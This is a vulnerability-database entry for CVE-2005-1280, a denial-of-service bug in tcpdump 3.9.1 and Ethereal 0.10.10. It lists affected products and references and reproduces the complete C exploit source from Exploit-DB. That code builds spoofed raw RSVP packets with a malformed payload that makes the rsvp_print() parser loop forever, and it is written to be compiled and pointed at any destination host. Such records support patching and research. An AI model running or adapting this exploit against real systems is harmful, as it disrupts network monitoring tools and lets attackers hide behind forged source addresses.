Sign-up

ID

VAR-E-200504-0269


CVE

cve_id:CVE-2005-1280

Trust: 1.9

sources: BID: 13390 // EXPLOIT-DB: 956 // EDBNET: 26022

EDB ID

956


TITLE

Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 956

DESCRIPTION

Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service. CVE-15904CVE-2005-1280 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 956

AFFECTED PRODUCTS

vendor:etherealmodel:tcpdumpscope:eqversion:0.10.10/3.9.1

Trust: 1.0

vendor:turbolinuxmodel:serverscope:eqversion:10.0

Trust: 0.3

vendor:turbolinuxmodel:appliance server workgroup editionscope:eqversion:1.0

Trust: 0.3

vendor:turbolinuxmodel:appliance server hosting editionscope:eqversion:1.0

Trust: 0.3

vendor:trustixmodel:secure linuxscope:eqversion:2.2

Trust: 0.3

vendor:trustixmodel:secure linuxscope:eqversion:2.1

Trust: 0.3

vendor:trustixmodel:secure enterprise linuxscope:eqversion:2.0

Trust: 0.3

vendor:susemodel:linux enterprise serverscope:eqversion:8

Trust: 0.3

vendor:susemodel:linux enterprise serverscope:eqversion:9

Trust: 0.3

vendor:susemodel:linux desktopscope:eqversion:1.0

Trust: 0.3

vendor:sgimodel:propackscope:eqversion:3.0

Trust: 0.3

vendor:scomodel:unixwarescope:eqversion:7.1.4

Trust: 0.3

vendor:scomodel:unixware upscope:eqversion:7.1.3

Trust: 0.3

vendor:scomodel:unixwarescope:eqversion:7.1.3

Trust: 0.3

vendor:scomodel:open serverscope:eqversion:6.0

Trust: 0.3

vendor:s u s emodel:suse linux school server for i386scope: - version: -

Trust: 0.3

vendor:s u s emodel:suse linux retail solutionscope:eqversion:8.0

Trust: 0.3

vendor:s u s emodel:suse linux openexchange serverscope:eqversion:4.0

Trust: 0.3

vendor:s u s emodel:open-enterprise-serverscope:eqversion:9.0

Trust: 0.3

vendor:s u s emodel:novell linux desktopscope:eqversion:9.0

Trust: 0.3

vendor:s u s emodel:linux professional x86 64scope:eqversion:9.3

Trust: 0.3

vendor:s u s emodel:linux professionalscope:eqversion:9.3

Trust: 0.3

vendor:s u s emodel:linux professional x86 64scope:eqversion:9.2

Trust: 0.3

vendor:s u s emodel:linux professionalscope:eqversion:9.2

Trust: 0.3

vendor:s u s emodel:linux professional x86 64scope:eqversion:9.1

Trust: 0.3

vendor:s u s emodel:linux professionalscope:eqversion:9.1

Trust: 0.3

vendor:s u s emodel:linux professional x86 64scope:eqversion:9.0

Trust: 0.3

vendor:s u s emodel:linux professionalscope:eqversion:9.0

Trust: 0.3

vendor:s u s emodel:linux professionalscope:eqversion:8.2

Trust: 0.3

vendor:s u s emodel:linux personal x86 64scope:eqversion:9.3

Trust: 0.3

vendor:s u s emodel:linux personalscope:eqversion:9.3

Trust: 0.3

vendor:s u s emodel:linux personal x86 64scope:eqversion:9.2

Trust: 0.3

vendor:s u s emodel:linux personalscope:eqversion:9.2

Trust: 0.3

vendor:s u s emodel:linux personal x86 64scope:eqversion:9.1

Trust: 0.3

vendor:s u s emodel:linux personalscope:eqversion:9.1

Trust: 0.3

vendor:s u s emodel:linux personal x86 64scope:eqversion:9.0

Trust: 0.3

vendor:s u s emodel:linux personalscope:eqversion:9.0

Trust: 0.3

vendor:s u s emodel:linux personalscope:eqversion:8.2

Trust: 0.3

vendor:redhatmodel:linux i386scope:eqversion:9.0

Trust: 0.3

vendor:redhatmodel:fedora core3scope: - version: -

Trust: 0.3

vendor:redhatmodel:fedora core2scope: - version: -

Trust: 0.3

vendor:redhatmodel:fedora core1scope: - version: -

Trust: 0.3

vendor:redhatmodel:enterprise linux wsscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux asscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:desktopscope:eqversion:4.0

Trust: 0.3

vendor:netbsdmodel:currentscope: - version: -

Trust: 0.3

vendor:netbsdmodel:netbsdscope:eqversion:4.0

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:10.2

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:10.2

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:10.1

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:10.1

Trust: 0.3

vendor:mandrivamodel:linux mandrake amd64scope:eqversion:10.0

Trust: 0.3

vendor:mandrakesoftmodel:corporate server x86 64scope:eqversion:3.0

Trust: 0.3

vendor:mandrakesoftmodel:corporate serverscope:eqversion:3.0

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.9.1

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.9

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.8.3

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.8.2

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.8.1

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.7.2

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.7.1

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.7

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.6.3

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.6.2

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.5.2

Trust: 0.3

vendor:lblmodel:tcpdump alphascope:eqversion:3.5

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.5

Trust: 0.3

vendor:lblmodel:tcpdump a6scope:eqversion:3.4

Trust: 0.3

vendor:lblmodel:tcpdumpscope:eqversion:3.4

Trust: 0.3

vendor:ipcopmodel:ipcopscope:eqversion:1.4.5

Trust: 0.3

vendor:ipcopmodel:ipcopscope:eqversion:1.4.4

Trust: 0.3

vendor:ipcopmodel:ipcopscope:eqversion:1.4.2

Trust: 0.3

vendor:ipcopmodel:ipcopscope:eqversion:1.4.1

Trust: 0.3

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:-prereleasescope:eqversion:5.4

Trust: 0.3

vendor:freebsdmodel:-stablescope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.3

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.2.1

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.2

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.2

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.2

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-release/alphascope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-release-p5scope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-releasescope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.1

Trust: 0.3

vendor:freebsdmodel:-relengscope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:-release-p14scope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:alphascope:eqversion:5.0

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:5.0

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.6.5

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.6.3

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.6.2

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.6

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.5.12

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.5.11

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.5.10

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.5.9

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.5.6

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.5

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.4

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.3

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.2

Trust: 0.3

vendor:f5model:big-ipscope:eqversion:4.0

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.6.3

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.6.2

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.6

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.5.12

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.5.11

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.5

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.4

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.3

Trust: 0.3

vendor:f5model:3-dnsscope:eqversion:4.2

Trust: 0.3

vendor:avayamodel:s8710 r2.0.1scope: - version: -

Trust: 0.3

vendor:avayamodel:s8710 r2.0.0scope: - version: -

Trust: 0.3

vendor:avayamodel:s8700 r2.0.1scope: - version: -

Trust: 0.3

vendor:avayamodel:s8700 r2.0.0scope: - version: -

Trust: 0.3

vendor:avayamodel:s8500 r2.0.1scope: - version: -

Trust: 0.3

vendor:avayamodel:s8500 r2.0.0scope: - version: -

Trust: 0.3

vendor:avayamodel:s8300 r2.0.1scope: - version: -

Trust: 0.3

vendor:avayamodel:s8300 r2.0.0scope: - version: -

Trust: 0.3

vendor:avayamodel:modular messagingscope:eqversion:2.0

Trust: 0.3

vendor:avayamodel:modular messagingscope:eqversion:1.1

Trust: 0.3

vendor:avayamodel:mn100scope: - version: -

Trust: 0.3

vendor:avayamodel:intuity lxscope: - version: -

Trust: 0.3

vendor:avayamodel:converged communications serverscope:eqversion:2.0

Trust: 0.3

vendor:f5model:big-ipscope:neversion:4.7

Trust: 0.3

vendor:f5model:big-ipscope:neversion:4.5.13

Trust: 0.3

vendor:f5model:3-dnsscope:neversion:4.7

Trust: 0.3

vendor:f5model:3-dnsscope:neversion:4.5.13

Trust: 0.3

sources: BID: 13390 // EXPLOIT-DB: 956

EXPLOIT

/*[ tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop DOS. ]*
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xtcpdump+ethr-rsvp-dos.c -o xtcpdump+ethr-rsvp-dos *
* *
* tcpdump homepage/URL: *
* http://www.tcpdump.org *
* *
* ethereal homepage/URL: *
* http://www.ethereal.com *
* *
* effected versions: *
* tcpdump: v3.8.x/v3.9.1/CVS (didn't check below 3.8.x) *
* ethereal: v0.10.10 (appears to be fixed in 0.10.10 SVN>14167) *
* *
* tcpdump(v3.9.1 and earlier versions) contains a remote denial *
* of service vulnerability in the form of a single (RSVP) packet *
* causing an infinite loop. *
* *
* this bug also effects ethereal[v0.10.10] in a similar way, i *
* did not check ethereals source code to find out why, tcpdump *
* was the focus. (the packet usually must be clicked on, the *
* ICMP replies given back will cause it too) *
* *
* as this bug doesn't appear to be fixed in the new(3.9.x/CVS) *
* versions i'll elaborate on the problem. the bug lies in *
* rsvp_print() in the RSVP_OBJ_ERO(and RSVP_OBJ_RRO) class, *
* allowing a zero length(+4 length really) situation, causing an *
* infinite loop. *
* *
* some versions of tcpdump(depending on the platform/OS) need no *
* special command-line arguments to allow this to happen, *
* however most need the "-v" argument. *
******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

#define DFL_AMOUNT 5

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
unsigned char version:4,ihl:4;
#else
unsigned char ihl:4,version:4;
#endif
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned int saddr;
unsigned int daddr;
};
struct rsvph{
unsigned char ver_flags;
unsigned char type;
unsigned short check;
unsigned char ttl;
unsigned char reserved;
unsigned short len;
};
struct sumh{
unsigned int saddr;
unsigned int daddr;
unsigned char fill;
unsigned char protocol;
unsigned short len;
};

/* malformed RSVP data. (the bug) */
static char payload[]=
"\x00\x08\x14\x01\x03\x00\x00\x00"
/* not needed for tcpdump, but this breaks ethereal. */
"\x00\x00\x00\x00";

/* prototypes. (and sig_alarm) */
void rsvp_spoof(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
unsigned char nospoof=0;
unsigned int amt=DFL_AMOUNT;
unsigned int daddr=0,saddr=0;
printf("[*] tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop "
"DOS.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
argv[0]);
exit(1);
}
if(!(daddr=getip(argv[1])))
printe("invalid destination host/ip.",1);
if(argc>2)saddr=getip(argv[2]);
if(argc>3)amt=atoi(argv[3]);
if(!amt)printe("no packets?",1);
printf("[*] destination\t: %s\n",argv[1]);
if(!nospoof)
printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
printf("[*] amount\t: %u\n\n",amt);
printf("[+] sending(packet = .): ");
fflush(stdout);
while(amt--){
/* spice things up. */
srandom(time(0)+amt);
rsvp_spoof(daddr,saddr);
printf(".");
fflush(stdout);
usleep(50000);
}
printf("\n\n[*] done.\n");
fflush(stdout);
exit(0);
}
/* (spoofed) generates and sends a (RSVP) ip packet. */
void rsvp_spoof(unsigned int daddr,unsigned int saddr){
signed int sock=0,on=1;
unsigned int psize=0;
char *p,*s;
struct sockaddr_in sa;
struct iph ip;
struct rsvph rsvp;
struct sumh sum;
/* create raw (rsvp) socket. */
if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RSVP))<0)
printe("could not allocate raw socket.",1);
/* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
printe("could not set IP_HDRINCL socket option.",1);
#endif
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=daddr;
psize=(sizeof(struct iph)+sizeof(struct rsvph)+sizeof(payload)-1);
memset(&ip,0,sizeof(struct iph));
memset(&rsvp,0,sizeof(struct rsvph));
/* values not filled = 0, from the memset() above. */
ip.ihl=5;
ip.version=4;
ip.tot_len=htons(psize);
ip.saddr=(saddr?saddr:random()%0xffffffff);
ip.daddr=daddr;
ip.ttl=(64*(random()%2+1));
ip.protocol=IPPROTO_RSVP;
ip.frag_off=64;
rsvp.ver_flags=16; /* v1/noflags. */
rsvp.type=20; /* HELLO. */
rsvp.ttl=(64*(random()%2+1));
rsvp.len=htons(sizeof(struct rsvph)+sizeof(payload)-1);
/* needed for the ip checksum. */
sum.saddr=ip.saddr;
sum.daddr=ip.daddr;
sum.fill=0;
sum.protocol=ip.protocol;
sum.len=htons(sizeof(struct rsvph)+sizeof(payload)-1);
/* make sum/calc buffer for the rsvp checksum. (correct) */
if(!(s=(char *)malloc(sizeof(struct rsvph)+sizeof(payload)+1)))
printe("malloc() failed.",1);
memset(s,0,(sizeof(struct rsvph)+sizeof(payload)+1));
memcpy(s,&rsvp,sizeof(struct rsvph));
memcpy(s+sizeof(struct rsvph),payload,sizeof(payload)-1);
rsvp.check=in_cksum((unsigned short *)s,sizeof(struct rsvph)
+sizeof(payload)-1);
free(s);
/* make sum/calc buffer for the ip checksum. (correct) */
if(!(s=(char *)malloc(sizeof(struct iph)+1)))
printe("malloc() failed.",1);
memset(s,0,(sizeof(struct iph)+1));
memcpy(s,&ip,sizeof(struct iph));
ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
free(s);
/* put the packet together. */
if(!(p=(char *)malloc(psize+1)))
printe("malloc() failed.",1);
memset(p,0,psize);
memcpy(p,&ip,sizeof(struct iph));
memcpy(p+sizeof(struct iph),&rsvp,sizeof(struct rsvph));
memcpy(p+(sizeof(struct iph)+sizeof(struct rsvph)),
payload,sizeof(payload));
/* send the malformed (RSVP) packet. */
if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
sizeof(struct sockaddr))<psize)
printe("failed to send forged RSVP packet.",1);
free(p);
return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
unsigned short answer=0;
register unsigned short *w=addr;
register int nleft=len,sum=0;
while(nleft>1){
sum+=*w++;
nleft-=2;
}
if(nleft==1){
*(unsigned char *)(&answer)=*(unsigned char *)w;
sum+=answer;
}
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer=~sum;
return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
struct hostent *t;
unsigned int s=0;
if((s=inet_addr(host))){
if((t=gethostbyname(host)))
memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
}
if(s==-1)s=0;
return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
printf("[!] %s\n",err);
if(e)exit(e);
return;
}

// milw0rm.com [2005-04-26]

Trust: 1.0

sources: EXPLOIT-DB: 956

EXPLOIT LANGUAGE

c

Trust: 0.6

sources: EXPLOIT-DB: 956

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 956

TYPE

'rsvp_print' Infinite Loop Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 956

CREDITS

vade79

Trust: 0.6

sources: EXPLOIT-DB: 956

EXTERNAL IDS

db:NVDid:CVE-2005-1280

Trust: 1.9

db:EXPLOIT-DBid:956

Trust: 1.6

db:EDBNETid:26022

Trust: 0.6

db:BIDid:13390

Trust: 0.3

sources: BID: 13390 // EXPLOIT-DB: 956 // EDBNET: 26022

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2005-1280

Trust: 1.6

url:https://www.exploit-db.com/exploits/956/

Trust: 0.6

url:http://tech.f5.com/home/bigip/solutions/advisories/sol4809.html

Trust: 0.3

url:http://rhn.redhat.com/errata/rhsa-2005-417.html

Trust: 0.3

url:http://www.ipcop.org/modules.php?op=modload&name=news&file=article&sid=21&mode=thread&order=0&thold=0

Trust: 0.3

url:http://www.tcpdump.org/

Trust: 0.3

url:http://support.avaya.com/elmodocs2/security/asa-2005-137_rhsa-2005-417_rhsa-2005-421.pdf

Trust: 0.3

sources: BID: 13390 // EXPLOIT-DB: 956 // EDBNET: 26022

SOURCES

db:BIDid:13390
db:EXPLOIT-DBid:956
db:EDBNETid:26022

LAST UPDATE DATE

2022-07-27T09:36:56.600000+00:00


SOURCES UPDATE DATE

db:BIDid:13390date:2009-06-23T19:19:00

SOURCES RELEASE DATE

db:BIDid:13390date:2005-04-26T00:00:00
db:EXPLOIT-DBid:956date:2005-04-26T00:00:00
db:EDBNETid:26022date:2005-04-26T00:00:00